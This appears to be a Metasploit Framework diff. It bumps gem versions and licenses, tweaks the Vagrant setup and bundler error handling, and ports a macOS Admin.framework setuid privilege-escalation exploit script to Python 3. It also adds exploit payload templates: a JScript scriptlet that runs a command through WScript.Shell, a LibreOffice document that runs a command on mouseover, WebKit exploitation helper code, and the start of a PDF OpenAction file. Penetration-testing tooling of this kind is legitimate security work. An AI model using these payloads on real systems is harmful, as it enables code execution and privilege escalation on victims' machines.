+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
+addressable, 2.6.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.4.0, unknown
-backports, 3.8.0, MIT
-bcrypt, 3.1.11, MIT
-bindata, 2.4.0, ruby
+arel-helpers, 2.9.1, MIT
+backports, 3.15.0, MIT
+bcrypt, 3.1.13, MIT
+bcrypt_pbkdf, 1.0.1, MIT
+bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
-bundler, 1.15.1, MIT
-coderay, 1.1.1, MIT
+bundler, 1.17.3, MIT
+coderay, 1.1.2, MIT
+concurrent-ruby, 1.0.5, MIT
+crass, 1.0.4, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.60.1, "Apache 2.0"
-docile, 1.1.5, MIT
+dnsruby, 1.61.2, "Apache 2.0"
+docile, 1.3.2, MIT
+ed25519, 1.2.4, MIT
 erubis, 2.7.0, MIT
-factory_girl, 4.8.0, MIT
-factory_girl_rails, 4.8.0, MIT
-faraday, 0.12.1, MIT
-filesize, 0.1.1, MIT
-fivemat, 1.3.5, MIT
-google-protobuf, 3.3.0, "New BSD"
-googleauth, 0.5.1, "Apache 2.0"
-grpc, 1.4.1, "New BSD"
+factory_girl, 4.9.0, MIT
+factory_girl_rails, 4.9.0, MIT
+faker, 1.9.6, MIT
+faraday, 0.15.4, MIT
+filesize, 0.2.0, MIT
+fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
-i18n, 0.8.6, MIT
+i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.1.0, ruby
-jwt, 1.5.6, MIT
-little-plugger, 1.1.4, MIT
-logging, 2.2.2, MIT
-loofah, 2.0.3, MIT
-memoist, 0.16.0, MIT
-metasm, 1.0.3, LGPL
-metasploit-aggregator, 0.2.1, "New BSD"
+json, 2.2.0, ruby
+loofah, 2.2.3, MIT
+metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 2.0.10, "New BSD"
-metasploit-framework, 4.15.0, "New BSD"
+metasploit-credential, 2.0.14, "New BSD"
+metasploit-framework, 4.17.72, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 2.0.15, "New BSD"
-metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
-method_source, 0.8.2, MIT
-mini_portile2, 2.2.0, MIT
-minitest, 5.10.2, MIT
-msgpack, 1.1.0, "Apache 2.0"
-multi_json, 1.12.1, MIT
-multipart-post, 2.0.0, MIT
+metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.17, "New BSD"
+metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
+method_source, 0.9.2, MIT
+mini_portile2, 2.4.0, MIT
+minitest, 5.11.3, MIT
+mqtt, 0.5.0, MIT
+msgpack, 1.3.0, "Apache 2.0"
+multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 4.1.0, MIT
-network_interface, 0.0.1, MIT
-nexpose, 6.1.0, BSD
-nokogiri, 1.8.0, MIT
-octokit, 4.7.0, MIT
-openssl-ccm, 1.2.1, MIT
+net-ssh, 5.2.0, MIT
+network_interface, 0.0.2, MIT
+nexpose, 7.2.1, "New BSD"
+nokogiri, 1.10.3, MIT
+octokit, 4.14.0, MIT
+openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
-os, 0.9.6, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.12.4, LGPL-2.1
-pdf-reader, 2.0.0, MIT
-pg, 0.20.0, "New BSD"
+pcaprub, 0.13.0, LGPL-2.1
+pdf-reader, 2.2.0, MIT
+pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
-postgres_ext, 3.0.0, MIT
-pry, 0.10.4, MIT
-public_suffix, 2.0.5, MIT
-rack, 1.6.8, MIT
+postgres_ext, 3.0.1, MIT
+pry, 0.12.2, MIT
+public_suffix, 3.1.1, MIT
+rack, 1.6.11, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.8, MIT
-rails-html-sanitizer, 1.0.3, MIT
-railties, 4.2.9, MIT
-rake, 12.0.0, MIT
-rb-readline, 0.5.4, BSD
-recog, 2.1.11, unknown
+rails-dom-testing, 1.0.9, MIT
+rails-html-sanitizer, 1.0.4, MIT
+railties, 4.2.11.1, MIT
+rake, 12.3.2, MIT
+rb-readline, 0.5.5, BSD
+recog, 2.3.2, unknown
 redcarpet, 3.4.0, MIT
-rex-arch, 0.1.9, "New BSD"
-rex-bin_tools, 0.1.4, "New BSD"
-rex-core, 0.1.11, "New BSD"
+rex-arch, 0.1.13, "New BSD"
+rex-bin_tools, 0.1.6, "New BSD"
+rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.15, "New BSD"
+rex-exploitation, 0.1.21, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.72, "New BSD"
-rex-random_identifier, 0.1.2, "New BSD"
+rex-powershell, 0.1.82, "New BSD"
+rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.8, "New BSD"
-rex-sslscan, 0.1.4, "New BSD"
+rex-socket, 0.1.17, "New BSD"
+rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.17, "New BSD"
+rex-text, 0.2.22, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-robots, 0.10.1, MIT
-rspec, 3.6.0, MIT
-rspec-core, 3.6.0, MIT
-rspec-expectations, 3.6.0, MIT
-rspec-mocks, 3.6.0, MIT
-rspec-rails, 3.6.0, MIT
+rspec, 3.8.0, MIT
+rspec-core, 3.8.2, MIT
+rspec-expectations, 3.8.4, MIT
+rspec-mocks, 3.8.1, MIT
+rspec-rails, 3.8.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.6.0, MIT
+rspec-support, 3.8.2, MIT
+ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 0.0.18, "New BSD"
+ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.1, "Simplified BSD"
-sawyer, 0.8.1, MIT
-signet, 0.7.3, "Apache 2.0"
-simplecov, 0.14.1, MIT
-simplecov-html, 0.10.1, MIT
-slop, 3.6.0, MIT
+rubyzip, 1.2.3, "Simplified BSD"
+sawyer, 0.8.2, MIT
+simplecov, 0.17.0, MIT
+simplecov-html, 0.10.2, MIT
 sqlite3, 1.3.13, "New BSD"
-sshkey, 1.9.0, MIT
-thor, 0.19.4, MIT
+sshkey, 2.0.0, MIT
+thor, 0.20.3, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 timecop, 0.9.1, MIT
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.3, MIT
-tzinfo-data, 1.2017.2, MIT
+tzinfo, 1.2.5, MIT
+tzinfo-data, 1.2019.2, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.9, MIT
+yard, 0.9.20, MIT
@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -22,11 +22,26 @@ unless ENV['BUNDLE_GEMFILE']
  end
 end

+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end
+
 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -1,11 +0,0 @@
-#!/bin/sh
-
-gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
-strip cpuinfo.ia32.bin && \
-gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
-strip cpuinfo.ia64.bin && \
-i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
-strip cpuinfo.exe
-
-ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
-
@@ -1,64 +0,0 @@
-// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
-
-/*
-#!/usr/bin/env ruby
-#    This file is part of Metasm, the Ruby assembly manipulation suite
-#    Copyright (C) 2006-2009 Yoann GUILLOT
-#
-#    Licence is LGPL, see LICENCE in the top-level directory
-
-
-#
-# this sample shows the compilation of a slightly more complex program
-# it displays in a messagebox the result of CPUID
-#
-
-*/
-
-#include <unistd.h>
-#include <stdio.h>
-
-static char *featureinfo[32] = {
-	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
-	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
-	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
-	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
-}, *extendinfo[32] = {
-	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
-	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
-	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
-	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
-};
-
-#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
-#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
-int main(void)
-{
-
-	unsigned long eax, ebx, ecx, edx;
-	unsigned long i;
-
-	cpuid(0);
-	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
-
-	cpuid(1);
-	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
-			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
-	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
-			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
-
-	fprintf(stdout, "FLAGS:");
-	for (i=0 ; i<32 ; i++)
-		if (edx & (1 << i))
-			fprintf(stdout, " %s", featureinfo[i]);
-
-	for (i=0 ; i<32 ; i++)
-		if (ecx & (1 << i))
-			fprintf(stdout, " %s", extendinfo[i]);
-
-	fprintf(stdout, "\n");
-	fflush(stdout);
-
-	return 0;
-}
-
@@ -27,7 +27,7 @@ def use_old_api():
 args = sys.argv

 if len(args) != 3:
-    print "usage: exploit.py source_binary dest_binary_as_root"
+    print("usage: exploit.py source_binary dest_binary_as_root")
    sys.exit(-1)

 source_binary = args[1]
@@ -42,7 +42,7 @@ attr = NSMutableDictionary.alloc().init()
 attr.setValue_forKey_(04777, NSFilePosixPermissions)
 data = NSData.alloc().initWithContentsOfFile_(source_binary)

-print "will write file", dest_binary
+print("will write file", dest_binary)

 if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
@@ -68,6 +68,6 @@ else:
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


-print "Done!"
+print("Done!")

 del pool
@@ -0,0 +1,16 @@
+<?xml version='1.0'?>
+<package>
+<component id='giffile'>
+<registration
+	description='Dummy'
+	progid='giffile'
+	version='1.00'
+	remotable='True'>
+</registration>
+<script language='JScript'>
+<![CDATA[
+	var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
+]]>
+</script>
+</component>
+</package>
@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
+ <office:scripts>
+  <office:script script:language="ooo:Basic">
+   <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
+    <ooo:library-embedded ooo:name="Standard"/>
+   </ooo:libraries>
+  </office:script>
+ </office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -0,0 +1,194 @@
+//
+// Tiny module that provides big (64bit) integers.
+//
+// Copyright (c) 2016 Samuel Groß
+//
+// Requires utils.js
+//
+
+// Datatype to represent 64-bit integers.
+//
+// Internally, the integer is stored as a Uint8Array in little endian byte order.
+function Int64(v) {
+    // The underlying byte array.
+    var bytes = new Uint8Array(8);
+
+    switch (typeof v) {
+        case 'number':
+            v = '0x' + Math.floor(v).toString(16);
+        case 'string':
+            if (v.startsWith('0x'))
+                v = v.substr(2);
+            if (v.length % 2 == 1)
+                v = '0' + v;
+
+            var bigEndian = unhexlify(v, 8);
+            bytes.set(Array.from(bigEndian).reverse());
+            break;
+        case 'object':
+            if (v instanceof Int64) {
+                bytes.set(v.bytes());
+            } else {
+                if (v.length != 8)
+                    throw TypeError("Array must have excactly 8 elements.");
+                bytes.set(v);
+            }
+            break;
+        case 'undefined':
+            break;
+        default:
+            throw TypeError("Int64 constructor requires an argument.");
+    }
+
+    // Return a double whith the same underlying bit representation.
+    this.asDouble = function() {
+        // Check for NaN
+        if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
+            throw new RangeError("Integer can not be represented by a double");
+
+        return Struct.unpack(Struct.float64, bytes);
+    };
+
+    // Return a javascript value with the same underlying bit representation.
+    // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
+    // due to double conversion constraints.
+    this.asJSValue = function() {
+        if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
+            throw new RangeError("Integer can not be represented by a JSValue");
+
+        // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
+        this.assignSub(this, 0x1000000000000);
+        var res = Struct.unpack(Struct.float64, bytes);
+        this.assignAdd(this, 0x1000000000000);
+
+        return res;
+    };
+
+    // Return the underlying bytes of this number as array.
+    this.bytes = function() {
+        return Array.from(bytes);
+    };
+
+    // Return the byte at the given index.
+    this.byteAt = function(i) {
+        return bytes[i];
+    };
+
+    // Return the value of this number as unsigned hex string.
+    this.toString = function() {
+        return '0x' + hexlify(Array.from(bytes).reverse());
+    };
+
+    this.lo = function()
+    {
+        var b = this.bytes();
+        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+    };
+
+    this.hi = function()
+    {
+        var b = this.bytes();
+        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
+    };
+
+    // Basic arithmetic.
+    // These functions assign the result of the computation to their 'this' object.
+
+    // Decorator for Int64 instance operations. Takes care
+    // of converting arguments to Int64 instances if required.
+    function operation(f, nargs) {
+        return function() {
+            if (arguments.length != nargs)
+                throw Error("Not enough arguments for function " + f.name);
+            for (var i = 0; i < arguments.length; i++)
+                if (!(arguments[i] instanceof Int64))
+                    arguments[i] = new Int64(arguments[i]);
+            return f.apply(this, arguments);
+        };
+    }
+
+    // this = -n (two's complement)
+    this.assignNeg = operation(function neg(n) {
+        for (var i = 0; i < 8; i++)
+            bytes[i] = ~n.byteAt(i);
+
+        return this.assignAdd(this, Int64.One);
+    }, 1);
+
+    // this = a + b
+    this.assignAdd = operation(function add(a, b) {
+        var carry = 0;
+        for (var i = 0; i < 8; i++) {
+            var cur = a.byteAt(i) + b.byteAt(i) + carry;
+            carry = cur > 0xff | 0;
+            bytes[i] = cur;
+        }
+        return this;
+    }, 2);
+
+    // this = a - b
+    this.assignSub = operation(function sub(a, b) {
+        var carry = 0;
+        for (var i = 0; i < 8; i++) {
+            var cur = a.byteAt(i) - b.byteAt(i) - carry;
+            carry = cur < 0 | 0;
+            bytes[i] = cur;
+        }
+        return this;
+    }, 2);
+
+    // this = a ^ b
+    this.assignXor = operation(function sub(a, b) {
+        for (var i = 0; i < 8; i++) {
+            bytes[i] = a.byteAt(i) ^ b.byteAt(i);
+        }
+        return this;
+    }, 2);
+
+    // this = a & b
+    this.assignAnd = operation(function sub(a, b) {
+        for (var i = 0; i < 8; i++) {
+            bytes[i] = a.byteAt(i) & b.byteAt(i);
+        }
+        return this;
+    }, 2)
+}
+
+// Constructs a new Int64 instance with the same bit representation as the provided double.
+Int64.fromDouble = function(d) {
+    var bytes = Struct.pack(Struct.float64, d);
+    return new Int64(bytes);
+};
+
+// Convenience functions. These allocate a new Int64 to hold the result.
+
+// Return -n (two's complement)
+function Neg(n) {
+    return (new Int64()).assignNeg(n);
+}
+
+// Return a + b
+function Add(a, b) {
+    return (new Int64()).assignAdd(a, b);
+}
+
+// Return a - b
+function Sub(a, b) {
+    return (new Int64()).assignSub(a, b);
+}
+
+// Return a ^ b
+function Xor(a, b) {
+    return (new Int64()).assignXor(a, b);
+}
+
+// Return a & b
+function And(a, b) {
+    return (new Int64()).assignAnd(a, b);
+}
+
+// Some commonly used numbers.
+Int64.Zero = new Int64(0);
+Int64.One = new Int64(1);
+
+// That's all the arithmetic we need for exploiting WebKit.. :)
@@ -0,0 +1,211 @@
+//
+// Utility functions.
+//
+// Copyright (c) 2016 Samuel Groß
+//
+
+// Return the hexadecimal representation of the given byte.
+function hex(b) {
+    return ('0' + b.toString(16)).substr(-2);
+}
+
+// Return the hexadecimal representation of the given byte array.
+function hexlify(bytes) {
+    var res = [];
+    for (var i = 0; i < bytes.length; i++)
+        res.push(hex(bytes[i]));
+
+    return res.join('');
+}
+
+// Return the binary data represented by the given hexdecimal string.
+function unhexlify(hexstr) {
+    if (hexstr.length % 2 == 1)
+        throw new TypeError("Invalid hex string");
+
+    var bytes = new Uint8Array(hexstr.length / 2);
+    for (var i = 0; i < hexstr.length; i += 2)
+        bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
+
+    return bytes;
+}
+
+function hexdump(data) {
+    if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
+        data = Array.from(data);
+
+    var lines = [];
+    for (var i = 0; i < data.length; i += 16) {
+        var chunk = data.slice(i, i+16);
+        var parts = chunk.map(hex);
+        if (parts.length > 8)
+            parts.splice(8, 0, ' ');
+        lines.push(parts.join(' '));
+    }
+
+    return lines.join('\n');
+}
+
+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function b2u32(b)
+{
+    return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+}
+
+
+
+function off2addr(segs, off)
+{
+    if(!(off instanceof Int64)) off = new Int64(off);
+    for(var i = 0; i < segs.length; ++i)
+    {
+        var start = segs[i].fileoff;
+        var end   = Add(start, segs[i].size);
+        if
+        (
+            (start.hi() < off.hi() || (start.hi() == off.hi() && start.lo() <= off.lo())) &&
+            (end.hi() > off.hi() || (end.hi() == off.hi() && end.lo() > off.lo()))
+        )
+        {
+            return Add(segs[i].addr, Sub(off, start));
+        }
+    }
+    return new Int64("0x4141414141414141");
+}
+
+function fsyms(mem, base, segs, want, syms)
+{
+    want = Array.from(want); // copy
+    if(syms === undefined)
+    {
+        syms = {};
+    }
+
+    var stab = null;
+    var ncmds = mem.u32(Add(base, 0x10));
+    for(var i = 0, off = 0x20; i < ncmds; ++i)
+    {
+        var cmd = mem.u32(Add(base, off));
+        if(cmd == 0x2) // LC_SYMTAB
+        {
+            var b = mem.read(Add(base, off + 0x8), 0x10);
+            stab =
+            {
+                symoff:  b2u32(b.slice(0x0, 0x4)),
+                nsyms:   b2u32(b.slice(0x4, 0x8)),
+                stroff:  b2u32(b.slice(0x8, 0xc)),
+                strsize: b2u32(b.slice(0xc, 0x10)),
+            };
+            break;
+        }
+        off += mem.u32(Add(base, off + 0x4));
+    }
+    if(stab == null)
+    {
+        fail("stab");
+    }
+    var tmp = { base: off2addr(segs, stab.stroff), off: 0 };
+    var fn = function(i)
+    {
+        return mem.read(Add(tmp.base, tmp.off + i), 1)[0];
+    };
+    for(var i = 0; i < stab.nsyms && want.length > 0; ++i)
+    {
+        tmp.off = mem.u32(off2addr(segs, stab.symoff + i * 0x10));
+        for(var j = 0; j < want.length; ++j)
+        {
+            var s = want[j];
+            if((strcmp(fn, s)))
+            {
+                syms[s] = mem.readInt64(off2addr(segs, stab.symoff + i * 0x10 + 0x8));
+                want.splice(j, 1);
+                break;
+            }
+        }
+    }
+    return syms;
+}
+
+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function _u32(i)
+{
+    return b2u32(this.read(i, 4));
+}
+
+function _read(i, l)
+{
+    if (i instanceof Int64) i = i.lo();
+    if (l instanceof Int64) l = l.lo();
+    if (i + l > this.length)
+    {
+        fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
+    }
+    return this.slice(i, i + l);
+}
+
+function _readInt64(addr)
+{
+    return new Int64(this.read(addr, 8));
+}
+
+function _writeInt64(i, val)
+{
+    if (i instanceof Int64) i = i.lo();
+    this.set(val.bytes(), i);
+}
+
+
+// Simplified version of the similarly named python module.
+var Struct = (function() {
+    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
+    var buffer      = new ArrayBuffer(8);
+    var byteView    = new Uint8Array(buffer);
+    var uint32View  = new Uint32Array(buffer);
+    var float64View = new Float64Array(buffer);
+
+    return {
+        pack: function(type, value) {
+            var view = type;        // See below
+            view[0] = value;
+            return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
+        },
+
+        unpack: function(type, bytes) {
+            if (bytes.length !== type.BYTES_PER_ELEMENT)
+                throw Error("Invalid bytearray");
+
+            var view = type;        // See below
+            byteView.set(bytes);
+            return view[0];
+        },
+
+        // Available types.
+        int8:    byteView,
+        int32:   uint32View,
+        float64: float64View
+    };
+})();
@@ -0,0 +1,125 @@
+%PDF
+1 0 obj
+<</Pages 1 0 R /OpenAction 2 0 R>>
